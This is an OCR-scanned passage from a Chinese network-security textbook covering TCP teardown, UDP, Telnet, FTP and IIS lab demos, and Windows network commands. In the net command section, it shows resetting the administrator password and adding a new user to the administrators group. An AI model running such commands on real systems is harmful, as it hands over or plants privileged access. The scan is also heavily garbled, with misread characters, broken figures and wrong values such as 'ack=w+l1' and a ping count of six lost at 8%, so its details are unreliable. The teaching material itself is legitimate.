关闭 TCP 连接 。A 的 释放 报 文 段 首部 的 FIN 置 1， 其 序号 是 seq=u， 它 等 于 前 面 已 传送 过 
的 数据 的 最 后 一 个 字 节 的 序号 加 1， 这 时 A 等 待 B 的 确认 。 第 二 次 握手 ，B 收 到 连接 释放 
报 文 段 后 即 发 出 确认 ， 确 认 号 是 ack=u+1， 而 这 个 报 文 段 自己 的 序号 是 v， 等 于 B 前 面 已 
传送 过 的 数据 的 最 后 一 个 字 节 的 序号 加 1， 这 时 的 TCP 连接 处 于 半 关 闭 状态 , 即 A 已 经 没 
有 数据 要 发 送 了 ， 但 B 若 发 送 数 据 ，A 仍 要 接收 ， 也 就 是 说 ， 从 B 到 A 的 这 个 方向 的 连 
接 并 未 关闭 ，A 收 到 来 自 B 的 确认 后 ， 等 待 B 发 出 的 连接 释放 报 文 段 。 第 三 次 握手 ，B 发 
出 连接 释放 报 文 段 ， 报 文 段 首 部 的 FIN 和 ACK 都 置 1, 序号 seq=w (在 半 关 闭 状态 B 可 能 
又 发 送 了 一 些 数据 )，B 还 必须 重复 上 次 已 发 送 过 的 确认 号 ack=u+1， 这 时 B 等 待 A 的 确 
认 。 第 四 次 握手 ，A 在 收 到 B 的 连接 释放 报 文 段 后 ， 必 须 对 此 发 出 确认 ， 在 确认 报 文 段 中 
把 ACK 置 1， 确 认 号 ack=w+l1， 而 自己 的 序号 是 seq=u+1。 
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所 示 ， 由 4 个 字段 组 成 ， 每 个 字段 的 长 度 都 是 两 


2.7 用 户 数据 报 协议 UDP 


UDP 可 以 提供 面向 无 连接 的 不 可 靠 的 支持 点 对 点 、 点 对 多 点 的 快速 传输 。 

(1) UDP 是 无 连接 的 ， 即 发 送 数据 之 前 不 需要 建立 连接 ， 因 此 减少 了 开销 和 发 送 数据 
之 前 的 时 延 。 
(2) UDP 不 保证 可 靠 交 付 ， 使 用 尽 最 大 努力 交付 。 

(3) UDP 支持 一 对 一 、 一 对 多 、 多 对 一 和 多 对 多 的 交互 通信 。 

UDP 有 两 个 字段 : 数据 字段 和 首部 字段 。 首 部 字段 很 简单 ， 只 有 8 个 字 节 ， 如 图 2-14 


个 字 节 。 各 字段 的 意义 如 下 。 


(1) 源 端口 : 写 入 源 端 口号 ， 在 需要 对 方 回 信 时 选用 ， 不 需要 时 可 用 全 0。 
(2) 目的 端口 : 写 入 目的 端口 号 。 
(3) 长 度 : UDP 用 户 数据 报 的 长 度 ， 其 最 小 值 是 8 个 字 节 〈 仅 有 首部 )。 
(4) 检验 和 : 检测 UDP 用 户 数据 报 在 传输 中 是 否 有 错 。 


字 节 2 


2 


2 


源 端口 


目的 端口 


长 度 


检验 和 | 


UDP 首 部 


UDP 的 数据 部 分 


图 2-14 UDP 的 首部 格式 


2.8 ”常用 的 网 络 服务 


网 络 服 务 需要 通过 端口 提供 ， 常 见 的 端口 、 端 口 使 用 的 协议 及 该 端口 提供 的 服务 如 
表 2-2 所 示 。 本 节 重 点 介绍 Telnet 服务 、FTP 服务 、Web 服务 。 


表 2-2 常用 服务 端口 列表 


端口 协议 
21 TCP 
23 TCP 
站 TCP 
53 TCP/UDP 
80 TCP 


2.8.1 Telnet 服务 
Telnet 是 TELecommunications NETwork 的 编写 ， 它 是 Intemet 远程 登录 服务 的 标准 协 
议和 主要 方式 ， 它 为 用 户 提供 了 在 本 地 计算 机 上 操作 远程 主机 工作 的 能 力 。 在 终端 用 户 的 
计算 机 上 使 用 Telnet 程序 ， 用 它 连接 到 服务 器 ， 终 端 用 户 可 以 在 Telnet 程序 中 输入 命令 ， 


服务 

FTP 服务 
Telnet 服务 
SMTP 服务 
DNS 服务 
Web 服务 


这 些 命令 会 在 服务 器 上 运行 ， 就 像 直 接 在 服务 器 的 控制 台 上 输入 一 样 。 要 开始 一 个 Telnet 
会 话 ， 必 须 输入 用 户 名 和 密码 来 登录 服务 器 。 

使 用 Telnet 协议 进行 远程 登录 时 需要 满足 以 下 条 件 : 在 本 地 计算 机 上 必须 装 有 包含 
Telnet 协议 的 客户 程序 ， 必 须知 道 远程 主机 的 瑟 地址 或 域名 ; 必须 知道 登录 标识 与 口令 。 
TeInet 远程 登录 服务 分 为 以 下 4 个 过 程 。 

(1) 本 地 与 远程 主机 建立 连接 。 该 过 程 实际 上 是 建立 一 个 TCP 连接 ， 用户 必须 知道 远 
程 主机 的 卫 地 址 或 域名 。 

(2) 将 本 地 终端 上 输入 的 用 户 名 和 口令 及 以 后 输入 的 任何 命令 或 字符 以 NVT (Net 
Virtual Terminal) 格式 传送 到 远程 主机 ， 该 过 程 实际 上 是 从 本 地 主机 向 远程 主机 发 送 一 个 
卫 数 据 包 。 

(3) 将 远程 主机 输出 的 NVT 格式 的 数据 转化 为 本 地 所 接受 的 格式 送 回 本 地 终端 ， 包 
括 输入 命令 回 显 和 命令 执行 结果 。 

(4) 最 后 ， 本 地 终端 对 远程 主机 进行 撤销 连接 ， 该 过 程 是 撤销 一 个 TCP 连接 。 

下 面 以 实例 演示 Telnet， 这 里 将 真实 机 作为 终端 用 户 的 计算 机 ， 虚 拟 机 作为 远程 服 
务 器 。 

1. 开启 真实 机 下 的 Telnet 功能 

由 于 Telnet 是 明文 传输 的 , 安全 性 较 差 , 在 Windows 7 系统 中 已 经 禁用 了 Telnet 服务 ， 
因此 ， 需 要 重新 开启 Windows 7 下 的 Telnet 服务 。 打 开 “ 控 制 面板 ” 选择 “程序 ”， 然 后 
选择 “打开 或 关闭 Windows 功能 ”由 于 这 里 真实 机 作为 客户 端 使 用 ， 这 里 只 将 “Telnet 
客户 端 ” 选 中 ， 单 击 “ 确 定 ” 按 钮 即 可 ， 如 图 2-15 所 示 。 
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有 Microsoft Message Queue (MSMQ) 服务 器 
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图 2-15 开启 真实 机 的 Telnet 功能 
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2. 启动 虚拟 机 的 Telnet 服务 
在 虚拟 机 “开始 ”菜单 中 选择 “程序 ”中 的 “管理 工具 ”， 然 后 选择 “Telnet 服务 器 管 
理 ” 在 Telnet 服务 管理 器 中 选择 4， 启动 Telnet 服务 器 ， 如 图 2-16 所 示 。 


是 Telnet 服务 器 管理 


请 在 下 列 选 项 中 选择 一 个 : 


请 输入 一 个 选项 的 号 码 [6 - 5] 以 选择 该 选项 : 4 
启动 Microsoft Telnet 服务 


Microsoft Telnet 服务 启动 成 功 - 


图 2-16 启动 虚拟 机 的 Telnet 服务 
3. 真实 机 远程 控制 虚拟 机 
在 真实 机 的 DOS 窗口 中 连接 虚拟 机 的 Telnet 服务 器 ， 如 图 2-17 所 示 。 
ee Pe) 


c:\>telnet 192.168.8.212 


Te 7 dd 


图 2-17 连接 虚拟 机 的 Telnet 服务 器 


此 时 出 现 登录 界面 ， 要 求 输入 用 户 名 和 密码 ， 在 login 中 输入 虚拟 机 操作 系统 的 某 一 
个 用 户 名 ， 在 password 中 输入 该 用 户 的 密码 ， 如 图 2-18 所 示 。 


IMicrosoft (R) Windows (TM) Uersion 5.060 (Build 2195) 


Welcome to Microsoft Telnet Seruice 
Telnet Seruer Build 5.09.99291.1 
login: administrator 

password : xxxxx 


图 2-18 登录 Telnet 服务 器 


登录 成 功 后 就 进入 到 虚拟 机 的 DOS 提示 符 界面 , 所 有 的 DOS 命令 就 可 以 使 用 , 例如 ， 
查看 虚拟 机 C 盘 根 目录 下 有 哪些 文件 ， 如 图 2-19 所 示 。 可见 , 真实 机 可 以 通过 Telnet 服务 
选 程控 制 虚拟 机 。 


:Wdir ce:\ 
驱动 器 C 中 的 卷 没有 标签 。 
卷 的 序列 号 是 B45F-6669 


<DIR> WINNT 

<DIR> Documents and Settings 
<DIR> Program Files 

<DIR> Inetpub 


文件 9 字 节 
4 个 于 和 191， 364,192 可 用 字 节 


图 2-19 真实 机 远程 控制 虚拟 机 


2.8.2 FTP 服务 


FTP 是 File Transfer Protocol (文件 传输 协议 ) 的 缩写 ， 用 于 Intemet 上 的 控制 文件 的 
双向 传输 。 同 时 ， 它 也 是 一 个 应 用 程序 。FTP 使 用 客户 /服务 器 方式 ,一 个 FTP 服务 器 进程 
可 同时 为 多 个 客户 进程 提供 服务 。FTP 的 服务 器 进程 由 两 大 部 分 组 成 : 一 个 主 进程 ， 负 责 
接受 新 的 请 求 ， 另 一 个 从 属 进 程 ， 负 责 处 理 单个 请 求 。 主 进程 的 工作 步骤 如 下 : 

(1) 打开 21 端口， 使 客户 进程 能 够 连接 上 ; 

(2) 等 待 客户 进程 发 出 连接 请 求 ; 

(3) 启动 从 属 进程 来 处 理 客户 进程 发 来 的 请 求 ， 从 属 进程 对 客户 进程 的 请 求 处 理 完毕 
后 即 终止 ; 

(4) 回 到 等 待 状态 ， 继 续 接 受 其 他 客户 进程 发 来 的 请 求 ， 主 进程 和 从 属 进程 的 处 理 是 
并 发 进行 的 。 

FTP 客户 端 可 以 是 命令 界面 也 可 是 图 形 界面 的 ， 命 令 界面 的 客户 端 如 图 2-20 所 示 。 


IsereNSdetnTetratoryetp 192.168.8.212 
连 楼 到 192.168.8.212。 

20 adseruer Microsoft FTP Service (Uersion 5.9) . 
用 户 (192.168.8.212:(none)): ftp 


N331 Anonymous access allowed, 5nd identity (e-mail name) as password. 
密码 : 

|230 Anonymous user logged in. 

tp> 


图 2-20 命令 界面 登录 FTP 服务 器 


也 可 以 在 浏览 器 中 输入 “ftp:// 主 机 下 地址 ”利用 图 形 界面 连接 FTP 服务 器 , 如 图 2-21 
所 示 。 


2.8.3 Web 服务 


Web 服务 是 目前 最 常用 的 服务 ， 使 用 HTTP 协议 ， 默 认 Web 服务 占用 80 端口 ， 在 
Windows 平台 下 一 般 使 用 HS (Internet Information Server， 因 特 网 信息 服务 器 ) 作为 Web 
服务 器 。Web 服务 的 特点 如 下 : 
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(1) 以 超 文本 方式 组 织 网 络 多 媒体 信息 ; 

(2) 用 户 可 以 在 世界 范围 内 任意 查找 、 检 索 、 浏 览 及 添加 信息 ; 
(3) 提供 生动 直观 、 易 于 使 用 且 统 一 的 图 形 用 户 界 面 ; 

(4) 服务 器 之 间 可 以 互相 连接 ; 

(5) 可 以 访问 图 像 、 声 音 、 影 像 和 文本 信息 。 


FTP 要 位 于 cic | 


Ca e feiss22, -El xs ”| 
全 收 大 | 高 肥 奸 网 站 尼 ] 网 页 快讯 库 ” 尼 百度 

大 Frp 根 位 于 192168.8212 前 ~ 国 - 呈 和 壹 -PD)- 安 2()- IR(O)” 加 -” 
FTP 根 位 于 192. 168. 8. 212 


若 要 在 出 ndows 资源 管理 器 中 查看 此 FTP 站 点， 请 单 击 “页面”， 然后 单 击 “ 在 
Windows 资源 管理 器 中 打开 FTP 站 点 ” 


07/31/2011 12:14 下 午 目录 ftp 


图 2-21 图 形 界面 登录 FTP 服务 器 


下 面 在 虚拟 机 上 ， 演 示 Web 服务 器 的 基本 配置 。 首 先 打 开 虚 拟 机 的 计算 机 管理 ， 选 择 
“服务 应 用 程序 ”选项 中 的 “Intemet 信息 服务 ”选项 ， 右 击 “ 默 认 Web 站 点 ”， 在 弹出 的 
菜单 中 单 击 “ 属 性 ”菜单 项 ， 打 开 “ 默 认 Web 站 点 属性 ”对 话 框 ， 如 图 2-22 所 示 。 


文件 。 编 缠 (E) ”查看 (V) 。 虞 拟 机 (M) ”分 组 (T) 窗口 (W) 帮助 (H) 
日 由 [ 国 四 四 固 回避 | 器 回 国 多 负 
EE SD windows 2000 Advanced - x 

电 计算 机 管理 


c:\program fies\common files\system\msadc 
CNWINNTIweb\printers 


图 2-22 ”在 “计算 机 管理 ”窗口 中 打开 默认 Web 站 点 属性 


在 打开 的 对 话 框 中 , 选择 “ 主 目录 ”选项 卡 , 查看 “本 地 路 径 ” 默认 为 ci\inetpub\Wwwwroot， 
也 可 单 击 “ 浏 览 ” 按 钮 进行 更 改 路 径 ， 同 时 ， 将 网 站 拷贝 到 该 路 径 下 ， 如 图 2-23 所 示 。 


OW x 


2-23 ”查看 或 修改 主 目录 路 径 


选择 “文档 ”选项 卡 ， 单 击 “ 添 加 ”按钮 ， 在 弹出 的 “添加 默认 文档 ”对 话 框 中 添加 
网 站 的 首页 文档 名 ， 这 里 添加 ip.asp 页 面 作为 网 站 首页 面 ， 单 击 “ 确 定 ” 按 钮 后 即 可 ， 如 
图 2-24 所 示 。 


图 2-24 添加 默认 文档 
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Web 服务 器 配置 完毕 后 , 就 可 以 通过 浏览 器 远程 登录 到 虚拟 机 作为 Web 服务 器 所 发 布 

的 网 站 页 面 中 , 在 真实 机 中 浏览 器 中 输入 虚拟 机 的 瑟 地 址 192.168.8.212， 即 登录 到 虚拟 机 

网 站 的 首页 面 上 , 首页 面 显 示 来 访 者 人 P 地 址 , 该 瑟 地 址 即 为 真实 机 卫 地 址 192.168.8.112， 
如 图 2-25 所 示 。 

FT ES 

[ej hpy/192168.8.212/ 7|B|5|x| | 

帘 收藏 天 | 部 旧 ] 建议 网 站 v 此] 网 页 快讯 库 Y 尼 ] 百度 | 

EE 全 ~- 四- 口 总 ~ mmm- seg- IRo-@@- "| 


个 合 


来 访 者 IP:192. 168. 8. 112 


”图 Imtemet | 保护 模式 : 禁用 


图 2-25 真实 机 访问 虚拟 机 发 布 的 网 站 


2.9 ”常用 的 网 络 命令 


常用 的 网 络 命令 有 : 判断 主机 是 否 连通 的 ping 命令 查看 网 络 连 接 状态 的 netstat 命令 、 
跟踪 显示 数据 包 的 tracert 命令 、 查 看 人 P 地 址 配置 情况 的 ipconfig 命令 。 


2.9.1 ping 命令 


ping 是 Windows 系列 自 带 的 一 个 可 执行 命令 ， 利 用 它 可 以 检查 网 络 是 否 能 够 连通 。 

1. 语法 结构 

ping [-t] [-a] [-n count] [-] length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [-] computer-list] | 
[-kcomputer-list] [-w timeout] destination-list 

2. 参数 说 明 

(1) -t: 一 直 ping 指定 的 计算 机 ， 直 到 从 键盘 按 下 CtrltC 中 断 。 

(2) -a: 将 地 址 解析 为 计算 机 的 NetBios 名 。 

(3) -n; 发 送 count 指定 的 ECHO 数据 包 数 ， 通 过 这 个 命令 可 以 自己 定义 发 送 的 个 数 ， 
对 衡量 网 络 速度 很 有 帮助 ， 能 够 测试 发 送 数据 包 的 返回 平均 时 间 及 时 间 的 快慢 程度 。 默 认 
值 为 4。 

例如 ， 通 过 测试 发 送 6 个 数据 报 返回 的 平均 时 间 、 最 快 时 间 和 最 慢 时 间 ， 判 断 真实 机 
和 虚拟 机 是 否 连通 ， 就 可 以 通过 以 下 命令 实现 ， 如 图 2-26 所 示 。 

(4) -1: 发 送 指定 数据 量 的 ECHO 数据 包 。 默 认为 32 字 节 ， 最 大 值 是 65500B， 超 过 
这 个 数 ， 对 方 就 有 可 能 因 接 收 的 数据 包 太 大 而 死机 。 

(5) -f 在 数据 包 中 发 送 “ 不 要 分 段 ” 标 志 ， 数 据 包 就 不 会 被 路 由 上 的 网 关 分 段 。 通 
常 发 送 的 数据 包 都 会 通过 路 由 分 段 再 发 送 给 对 方 ,加 上 此 参数 以 后 路 由 就 不 会 再 分 段 处 理 。 

(6) -i; 将 “生存 时 间 ” 字 段 设置 为 TTL 指定 的 值 ， 指 定 TIL 值 在 对 方 的 系统 里 停留 


的 时 间 ， 同 时 检查 网 络 的 运转 情况 。 


C:\>ping -n 6 192.168.8.212 


FE 在 Ping 192.168.8.212 具有 32 字 节 的 数据 : 
168.8.212 的 : 字 2 时 间 :15ms TTL=128 
.168.8.212 的 : 字 2 时 间 <1ms TTL=128 
.168.8.212 的 : 字 2 时 间 <1ms TTLz128 

: 字 

: 字 

: 字 


.168.8.212 的 2 时 间 <1ms TTL=128 
.168.8.212 的 2 时 间 <1ms TTL=128 
.168.8.212 的 2 时 间 <1ms TTL=128 


192.168.8.212 的 Ping 统计 信息 : 
数据 包 : 已 发 送 = 6， 已 接收 = 6， 丢失 = 6 (8% 丢失 )， 
往返 行程 的 估计 时 间 ( 以 毫秒 为 单位 ): 
最 短 : gms， 最 长 : 15ms， 平均 : 2ms 
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节 =3 
节 =3 
节 =3 
节 =3 
节 =3 
节 -3 


图 2-26 发 送 6 个 数据 报 判断 真实 机 与 虚拟 机 是 否 连通 


(7) -v: tos 将 “服务 类 型 ”字段 设置 为 tos 指定 的 值 。 

(8) -r: 在 “记录 路 由 ”字段 中 记录 传 出 和 返回 数据 包 的 路 由 。 通 常情 况 下 ， 发 送 的 
数据 包 是 通过 一 系列 路 由 才 到 达 目 标 地址 的 ,通过 此 参数 可 以 设 定 想 探测 经 过 路 由 的 个 数 ， 
限定 能 跟踪 到 9 个 路 由 。 

(9) -s: 指定 count 指定 的 跃 点 数 的 时 间 戳 。 与 参数 -r 差不多 ， 但 此 参数 不 记录 数据 
包 返 回 所 经 过 的 路 由 ， 最 多 只 记录 4 个 。 

(10) -j: 利用 computer-list 指定 的 计算 机 列表 路 由 数据 包 ， 连 续 计 算 机 可 以 被 中 间 网 
关 分 隔 ( 路 由 稀 跑 源 ) IP 允许 的 最 大 数量 为 9。 

(11) -k: computer-list 利用 computer-list 指定 的 计算 机 列表 路 由 数据 包 ， 连 续 计算 机 
不 能 被 中 间 网 关 分 隔 〈 路 由 严格 源 ) IP 允许 的 最 大 数量 为 9。 

(12) -w: timeout 指定 超时 间隔 ， 单 位 为 毫秒 。 

(13) destination-list: ”指定 要 ping 的 远程 计算 机 的 主机 名 或 耳 地 址 。 

一 般 情 况 下 ， 通 过 ping 目标 地 址 ， 可 让 对 方 返回 TTL 值 的 大 小 ， 通 过 TTL 值 可 以 粗 
略 判断 目标 主机 的 系统 类 型 是 Windows 还 是 UNIX/Linux， 一 般 情况 下 Windows 系统 返回 
的 TIL 值 在 100 一 130 之 间 , 而 UNIX/Linux 系统 返回 的 TTL 值 在 240 一 255 之 间 , 但 TTL 
的 值 是 可 以 修改 的 ， 因 此 该 方法 只 可 作为 参考 。 

3. 各 类 反馈 信息 

1 ) Request timed out 
出 现 该 反馈 信息 可 能 是 以 下 几 种 情况 之 一 : 四 对 方 已 关机 ， 或 者 网 络 上 根本 没有 这 个 
地 址 ，@ 对 方 与 自己 不 在 同一 网 段 内 ， 通 过 路 由 也 无 法 找到 对 方 ， 但 有 时 对 方 确实 是 存在 
的 ; @ 对 方 确 实 存 在 ,但 设置 了 ICMP 数据 包 过 滤 〈 比 如 防火 墙 设置 ); @ 错 误 设置 他 地 址 。 

2) Destination host Unreachable 
出 现 该 反馈 信息 可 能 是 以 下 几 种 情况 之 一 : 四 对 方 与 自己 不 在 同一 网 段 内 ， 而 自己 又 
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未 设置 默认 的 路 由 ; @@ 网 线 出 了 故障 .这 里 要 说 明 一 下 destination host unreachable 和 Request 
time out 的 区 别 ， 如 果 所 经 过 的 路 由 器 的 路 由 表 中 具有 到 达 目 标的 路 由 ， 而 目标 因为 其 他 
原因 不 可 到 达 ， 这 时 候 会 出 现 time out， 如 果 路 由 表 中 连 到 达 目 标的 路 由 都 没有 ， 那 就 会 
出 现 Destination host unreachable。 

3) Bad IP address 

这 个 信息 表示 可 能 没有 连接 到 DNS 服务 器 ， 所 以 无 法 解析 这 个 P 地 址 ， 也 可 能 是 人 P 
地 址 不 存在 。 

4) Source quench received 

这 个 信息 比较 特殊 ， 它 出 现 的 概率 很 小 。 它 表示 对 方 或 中 途 的 服务 器 繁忙 无 法 回应 。 

5) Unknown host 

这 种 出 错 信 息 的 意思 是 , 该 远程 主机 的 名 字 不 能 被 域名 服务 器 (DNS ) 转换 成 全 地 址 。 
故障 原因 可 能 是 域名 服务 器 有 故障 ， 或 者 其 名 字 不 正确 ， 或 者 网 络 管理 员 的 系统 与 远程 主 
机 之 间 的 通信 线路 有 故障 。 

6) No answer 

这 种 故障 说 明 本 地 系统 有 一 条 通 向 中 心 主机 的 路 由 ， 但 却 接收 不 到 它 发 给 该 中 心 主 机 
的 任何 信息 。 故 障 原因 可 能 是 下 列 之 一 : 中 中 心 主机 没有 工作 ;外 本 地 或 中 心 主机 网 络 配 
置 不 正确 ，@ 本 地 或 中 心 的 路 由 器 没有 工作 ;，@ 通 信 线 路 有 故障 ，@ 中 心 主机 存在 路 由 选 
择 问题 。 


2.9.2 ”netstat 命令 


netstat 是 一 个 监控 TCP/IP 网 络 的 非常 有 用 的 工具 , 它 可 以 显示 路 由 表 、 实 际 的 网 络 连 
接 以 及 每 一 个 网 络 接口 设备 的 状态 信息 。netstat 用 于 显示 与 了 了、TCP、UDP 和 ICMP 协议 
相关 的 统计 数据 ， 一 般 用 于 检验 本 机 各 端口 的 网 络 连接 情况 。 

1. 语法 结构 

netstat [-a] [-e] [-n] [-s] [-p proto] [-r] 

2. 参数 说 了 明 

(1) -a 显示 所 有 主机 的 端口 号 。 

(2) -e 显示 以 太 网 统计 信息 。 

(3) -n 以 数字 表格 形式 显示 地 址 和 端口 。 

(4) -p proto 显示 特定 的 协议 的 具体 使 用 信息 。 

(5) < 工 显 示 本 机 路 由 表 的 内 容 。 

(6) -s 显示 每 个 协议 的 使 用 状态 (包括 TCP、UDP 和 也 )。 

例如 ， 以 数字 形式 显示 真实 机 所 有 的 端口 信息 ， 如 图 2-27 所 示 。 

2.9.3 tracert 命令 

tracert 命令 的 功能 是 判定 数据 包 到 达 目 的 主机 所 经 过 的 路 径 、 显 示 数 据 包 经 过 的 中 继 
节点 清单 和 到 达 时 间 。 

1. 语法 结构 

tracert [-d] [-h maximum hops] [-] host-list] [-w timeout] target name 


C:\>netstat -an 
活动 连接 
协议 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 


一 
划 
辣 


ooeoooeoooeoooooeao 后 


9. 
9. 
9. 
9. 
90. 
9. 
9. 
9. 
9. 
9. 
9. 
0, 
0. 
9. 


oooooooooooooo 
oooooooooooooo 
oooooooooooooo 

~oooooooooooooa 
oooooooooooooa 

-oooooooooooooo 
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9. 
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图 2-27 查看 真实 机 端口 信息 


2. 参数 说 明 

(1) -d 是 要 求 tracert 不 对 主机 名 进行 解析 。 
(2) -h 是 指定 搜索 到 目的 地 址 的 最 大 轮 数 。 
(3) -j 的 功能 是 沿 着 主机 列表 释放 源 路 由 。 
(4) -w 用 来 设置 超时 时 间 间 隔 。 


状态 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
CLOSE_WRIT 
CLOSE_WRIT 
CLOSE_URIT 
CLOSE_URIT 
CLOSE_WRIT 
CLOSE_URIT 


ESTABLISHED 


例如 ， 跟 踪 真 实 机 到 达 搜 狐 服务 器 的 数据 包 ， 如 图 2-28 所 示 。 


:\>tracert Www.sohu.com 


通过 最 多 39 个 跃 点 跟踪 
到 frontend-sy.a.sohu.com [218.69.39.195] 的 路 由 : 


请 求 超时 。 
218.19.116.65 
113.4.128.49 
113.4.128.178 
221.212.1.89 
219.158.20.158 
113.230.184.186 


cncln.online.ln.cn [218.60.20.146] 


61.189.1.14 
cncln.online.ln.cn [218 


cncln.online.ln.cn [218.60.39.105] 


.69.7.126] 


DD 


图 2-28 跟踪 真实 机 到 达 搜 狐 服务 器 的 数据 包 
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2.9.4 ”ipconfig 命令 


ipconfig 命令 显示 TCP/IP 网 络 配置 信息 、 刷 新 动态 主机 配置 协议 和 域名 系统 设置 。 使 
用 不 带 参 数 的 ipconfig 命令 可 以 显示 所 有 适配器 的 瑟 地 址 、 子 网 掩 码 和 默认 网 关 ， 例 如 查 
看 虚拟 机 的 网 络 配置 情况 ， 如 图 2-29 所 示 。 


C:\WINNT\System32\cmd.exe 


C:\>ipconfig 


Windows 2000 IP Configuration 
Ethernet adapter 本 地 连接 : 


Connection-specific DNS Suffix 
EP DOPoDG ss ue ls 
i a nn 


UB 


图 2-29 查看 虚拟 机 主机 下 配置 


从 图 2-29 中 可 以 看 出 ， 在 没有 该 参数 的 情况 下 ， 只 显示 IP 地 址 、 子 网 掩 码 和 各 个 适 
配器 的 默认 网 关 值 。 参 数 “/all” 的 功能 是 显示 所 有 适配器 的 完整 TCP/IP 配置 信息 ， 如 
图 2-30 所 示 。 


C:\WINNT\System32\cmd.exe 


C:\>ipconfig /all 
Windows 2000 IP Configuration 


Host Name : adseruer 
Primary DNS Suffix 
Node Type 

IP Routing Enabled 
WINS Proxy Enabled 


Hybrid 


Ethernet adapter 本 地 连接 : 


Connection-specific DNS Suffix .: 
Description : AMD PCNET Family 


Physical Address : 99-9C-29-7C-CD-EB 
DHCP Enabled : No 

: 192.168.8.212 

: 255.255.255.0 


图 2-30 显示 虚拟 机 所 有 了 P 配置 信息 


2.9.5 net 命 令 


net 命令 的 功能 非常 强大 , 在 网 络 安全 领域 通常 用 来 查看 计算 机 上 的 用 户 列表 、 添加 和 
删除 用 户 、 与 对 方 计算 机 建立 连接 、 启 动 或 者 停止 某 网 络 服务 等 。 


使 用 net user 查看 虚拟 机 计算 机 上 的 用 户 列表 ， 如 图 2-31 所 示 。 


:N>net user 时 


\ADSERUER 的 用 户 账户 


Ss 晶 
dministrator Guest IUSR_ADSERU 
IWAM_ADSERUER TsInternetUser 
成 功 完成 。 
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图 2-31 查看 计算 机 上 的 用 户 列表 
使 用 “netuser 用 户 名 密码 ”可 给 用 户 修改 密码 ， 例 如 将 管理 员 的 密码 修改 为 hello， 
如 图 2-32 所 示 。 


:Nnet user administrator hello 


命令 成 功 完成 。 


:VD 


图 2-32 ”修改 管理 员 口 令 


使 用 net 指令 可 以 在 命令 行 下 新 建 一 个 用 户 并 将 用 户 添加 到 管理 员 组 ， 例 如 添加 一 个 
用 户 名 为 zhangsan， 密 码 为 123456 的 用 户 到 管理 员 组 ， 可 以 使 用 两 条 net 命令 来 实现 ， 如 
图 2-33 所 示 。 其 中 第 一 条 命令 在 计算 机 上 新 建 一 个 用 户 zhangsan， 第 二 条 命令 将 该 用 户 
zhangsan 添加 到 管理 员 组 ， 第 三 条 命令 查看 用 户 列 表 ， 可 以 看 出 zhangsan 已 添加 成 功 ， 
在 管理 员 组 中 。 


C:\>net user zhangsan /add 和 
功 完成 。 


C:N\>net localgroup administrators zhangsan /add 


命令 成 功 完成 


:N>net user 


dministrator Guest IUSR_hDSERU 
IWAM_ADSERUER TsInternetUser zhangsan 


命令 成 功 完成 。 
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图 2-33 新建 用 户 并 添加 到 管理 员 组 
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思考 与 练习 


1. 请 简单 说 明 OSI 参考 模型 的 基本 结构 。 

2. 从 协议 分 层 模 型 方面 来 看 ，TCP/IP 由 哪儿 个 层次 组 成 ? 各 层 的 功能 是 什么 ? 

3. 试 比较 TCP 协议 与 UDP 协议 的 异同 。 

4. 简 述 全 协议 头 的 结构 。 

5. 抓 取 Telnet 的 数据 报 ， 并 分 析 TCP 头 的 结构 ， 分 析 TCP 的 “三 次 握手 ”和 “四 次 
握手 ”的 过 程 〈 上 机 完成 )。 

6. 简 述 常用 的 网 络 服务 及 提供 服务 的 默认 端口 。 

7. 简 述 ping 命令 的 功能 。 


第 3 章 网 络 安全 编程 基础 


本 章 学 习 目 标 : 
。 了 解 Windows 内 部 机 制 ; 
。 掌握 网 络 编程 技术 。 


3.1 网络 安 全 编程 概述 


网 络 安全 编程 又 称 为 黑客 编程 ， 是 指 采 用 常规 的 编程 技术 ， 编 写 网 络 安 全 、 黑 客 攻 防 
类 的 程序 、 工 具 。 网 络 安全 编程 按照 攻防 角度 分 为 攻击 类 黑客 编程 和 防范 类 黑客 编程 ， 按 
照 黑 客 和 网 络 安全 角度 分 为 黑客 工具 编程 和 网 络 安全 编程 。 编 程 是 一 项 比较 综合 的 工作 ， 
学 习 编程 首先 要 了 解 系统 本 身 的 内 部 工作 机 理 和 编程 语言 ， 然 后 再 熟练 使 用 编程 工具 和 各 
种 编程 技巧 。 
3.1.1 Windows 内 部 机 制 


Windows 是 一 个 “基于 事件 的 ， 消 息 驱动 的 ”操作 系统 。 在 Windows 下 执行 一 个 程 
序 ， 只 要 用 户 进行 了 影响 窗口 的 动作 (如 改变 窗口 大 小 或 移动 、 单 击 鼠 标 等 )， 该 动作 就 会 
触发 一 个 相应 的 “事件 ”。 系统 每 次 检测 到 一 个 事件 时 ， 就 会 给 程序 发 送 一 个 “消息 ” 从 
而 使 程序 可 以 处 理 该 事件 。 每 个 Windows 应 用 程序 都 是 基于 事件 和 消息 的 ， 而 且 包含 一 
个 主事 件 循环 ， 它 不 停 地 、 反 复 地 检测 是 否 有 用 户 事件 发 生 。 每 次 检测 到 一 个 用 户 事件 ， 
程序 就 对 该 事件 做 出 响应 ， 处 理 完 再 等 待 下 一 个 事件 的 发 生 。Windows 下 的 应 用 程序 不 断 
地 重复 这 一 过 程 ， 直 至 用 户 终 止 程序 ， 用 代码 来 描述 实际 上 也 就 是 一 个 消息 处 理 过 程 的 
while 循环 语 

下 面 简单 介绍 一 下 与 Windows 系统 密切 相关 的 几 个 基本 概念 。 

1. 窗口 

窗口 是 Windows 本 身 以 及 Windows 环境 下 的 应 用 程序 的 基本 界面 单位 ， 但 是 很 多 人 
都 误 以 为 只 有 具有 标题 栏 、 状 态 栏 、 最 大 化 、 最 小 化 按钮 这 样 标准 的 方 框 才 叫 窗口 。 其 实 
窗口 的 概念 很 广 ， 例 如 按钮 和 对 话 框 等 也 是 窗口 ， 而 且 是 一 种 特殊 的 窗口 。 

从 用 户 的 角度 看 ， 窗 口 就 是 显示 在 屏幕 上 的 一 个 矩形 区 域 ， 其 外 观 独立 于 应 用 程序 ， 
事实 上 它 就 是 生成 该 窗口 的 应 用 程序 与 用 户 间 的 直观 接口 ， 从 应 用 程序 的 角度 看 ， 窗 口 是 
